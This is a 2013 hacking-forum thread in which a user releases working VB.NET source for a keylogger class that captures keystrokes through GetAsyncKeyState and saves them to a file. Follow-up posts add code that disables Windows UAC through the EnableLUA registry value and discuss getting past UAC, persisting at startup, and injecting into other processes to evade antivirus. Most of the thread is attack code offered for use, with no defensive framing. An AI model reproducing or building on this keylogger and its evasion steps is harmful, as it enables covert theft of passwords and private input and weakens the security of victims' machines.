[Release] Keylogger Class

SQLi · 05-29-2013, 05:08 AM

A Keylogger class

About
I decided to translate a C++ keylogger to Visual Basic .NET, it turned out okay, but it might not be very stable, it might skip a key here and there while you're typing. I'm too tired right now to look into it any further, but here's the code:

Keylogger.vb

Code:
Imports System.Threading

Imports System.IO

Public Class Keylogger

    Private Declare Function GetKey Lib "user32" Alias "GetAsyncKeyState" (ByVal vKey As Int32) As Int16

    Private Log As String

    Public Logging As Boolean = False

    Public Enum KeyDef

        VK_ADD = &H6B

        VK_ATTN = &HF6

        VK_BACK = &H8

        VK_CANCEL = &H3

        VK_CAPITAL = &H14

        VK_CLEAR = &HC

        VK_CONTROL = &H11

        VK_CRSEL = &HF7

        VK_DECIMAL = &H6E

        VK_DELETE = &H2E

        VK_DIVIDE = &H6F

        VK_DOWN = &H28

        VK_END = &H23

        VK_EREOF = &HF9

        VK_ESCAPE = &H1B

        VK_EXECUTE = &H2B

        VK_EXSEL = &HF8

        VK_F1 = &H70

        VK_F10 = &H79

        VK_F11 = &H7A

        VK_F12 = &H7B

        VK_F13 = &H7C

        VK_F15 = &H7E

        VK_F14 = &H7D

        VK_F16 = &H7F

        VK_F17 = &H80

        VK_F18 = &H81

        VK_F19 = &H82

        VK_F2 = &H71

        VK_F20 = &H83

        VK_F21 = &H84

        VK_F22 = &H85

        VK_F23 = &H86

        VK_F24 = &H87

        VK_F3 = &H72

        VK_F4 = &H73

        VK_F5 = &H74

        VK_F6 = &H75

        VK_F7 = &H76

        VK_F8 = &H77

        VK_F9 = &H78

        VK_HELP = &H2F

        VK_HOME = &H24

        VK_INSERT = &H2D

        VK_LBUTTON = &H1

        VK_LCONTROL = &HA2

        VK_LEFT = &H25

        VK_LMENU = &HA4

        VK_LSHIFT = &HA0

        VK_MBUTTON = &H4 ' NOT contiguous with L RBUTTON

        VK_MENU = &H12

        VK_MULTIPLY = &H6A

        VK_NEXT = &H22

        VK_NONAME = &HFC

        VK_NUMLOCK = &H90

        VK_NUMPAD0 = &H60

        VK_NUMPAD1 = &H61

        VK_NUMPAD2 = &H62

        VK_NUMPAD3 = &H63

        VK_NUMPAD4 = &H64

        VK_NUMPAD5 = &H65

        VK_NUMPAD6 = &H66

        VK_NUMPAD7 = &H67

        VK_NUMPAD8 = &H68

        VK_NUMPAD9 = &H69

        VK_OEM_CLEAR = &HFE

        VK_PA1 = &HFD

        VK_PAUSE = &H13

        VK_PLAY = &HFA

        VK_PRINT = &H2A

        VK_PRIOR = &H21

        VK_PROCESSKEY = &HE5

        VK_RBUTTON = &H2

        VK_RCONTROL = &HA3

        VK_RETURN = &HD

        VK_RIGHT = &H27

        VK_RMENU = &HA5

        VK_RSHIFT = &HA1

        VK_SCROLL = &H91

        VK_SELECT = &H29

        VK_SEPARATOR = &H6C

        VK_SHIFT = &H10

        VK_SNAPSHOT = &H2C

        VK_SPACE = &H20

        VK_TAB = &H9

        VK_SUBTRACT = &H6D

        VK_UP = &H26

        VK_ZOOM = &HFB

    End Enum

    Private Function RunThread(ByVal Start As System.Threading.ThreadStart) As Thread

        Dim thread = New System.Threading.Thread(Start)

        thread.Start()

        Return thread

    End Function

    Public Sub Start()

        Logging = True

        RunThread(AddressOf Keylog)

    End Sub

    Public Sub Close()

        Logging = False

    End Sub

    Private Sub Keylog()

        Log = ""

        Do Until Logging = False

            For character As Short = 8 To 222

                If GetKey(character) = -32767 Then

                    If character > 39 And character < 64 Then

                        Log &= Chr(character)

                        Exit For

                    ElseIf character > 64 And character < 91 Then

                        character += 32

                        Log &= Chr(character)

                        Exit For

                    Else

                        Select Case character

                            Case KeyDef.VK_SPACE

                                Log &= " "

                                Exit For

                            Case KeyDef.VK_SHIFT

                                Log &= "[SHIFT]"

                                Exit For

                            Case KeyDef.VK_RETURN

                                Log &= Environment.NewLine & "[ENTER]"

                                Exit For

                            Case KeyDef.VK_BACK

                                'Log &= "[BACKSPACE]"

                                If Log.Length > 0 And Log.Length <> 0 Then

                                    Log = Log.Remove(Log.Length - 1)

                                End If

                                Exit For

                            Case KeyDef.VK_TAB

                                Log &= "[TAB]"

                                Exit For

                            Case KeyDef.VK_CONTROL

                                Log &= "[CTRL]"

                                Exit For

                            Case KeyDef.VK_DELETE

                                Log &= "[DEL]"

                                Exit For

                            Case KeyDef.VK_CAPITAL

                                Log &= "[CAPS LOCK]"

                                Exit For

                            Case Else

                                Exit For

                                'todo: comma, period

                        End Select

                    End If

                End If

            Next

        Loop

    End Sub

    Public Sub SaveLog(ByVal File As String)

        IO.File.WriteAllText(File, Log)

    End Sub

End Class

Usage example

Code:
Dim KeyL As New Keylogger

KeyL.Start()

If KeyL.Logging Then

    KeyL.Close()

End If

KeyL.SaveLog("C:\log.txt")

i0xIllusi0n · 05-29-2013, 05:24 AM

Not bad at first look. But then there's the challenge of getting passed UAC let alone startup.

SQLi · 05-29-2013, 10:32 AM

(05-29-2013, 05:24 AM)i0xIllusi0n Wrote: Not bad at first look. But then there's the challenge of getting passed UAC let alone startup.

Well I'm not going to include that in the Keylogger class. Perhaps I'll cook something up later.

Edit:
This should work, credits to laptopguy for the original C# code

Code:
Imports Microsoft.Win32

Public Class UAC

    Public Shared Sub Disable()

        Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System").SetValue("EnableLUA", 0)

    End Sub

    Public Shared Sub Enable()

        Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System").SetValue("EnableLUA", 1)

    End Sub

End Class

i0xIllusi0n · 05-29-2013, 07:36 PM

(05-29-2013, 10:32 AM)SQLi Wrote: Well I'm not going to include that in the Keylogger class. Perhaps I'll cook something up later.

Edit:
This should work, credits to laptopguy for the original C# code

Code:
Imports Microsoft.Win32 Public Class UAC Public Shared Sub Disable() Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System").SetValue("EnableLUA", 0) End Sub Public Shared Sub Enable() Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System").SetValue("EnableLUA", 1) End Sub End Class

Which has to be ran as admin to be able to read /write from the registry.

ErroraBorealis · 05-29-2013, 07:42 PM

I'm not so sure, but I believe there is a way to write to one part of the registry, maybe its local user, without admin, or you can run it under local user or something, and boost it up from there. Might also be possible to inject into some other process, but that's normally picked up pretty fast by AVs especially if it thinks the program is suspicious at first.

Prestige · 05-30-2013, 12:41 AM

You might want to use a keyhook instead of a thread with getasynckeystate here's an example tutorial for a keyhook in C# could be easily ported: http://www.sinister.ly/Thread-Tutorial-C...yboardhook

[Release] Keylogger Class
Author Message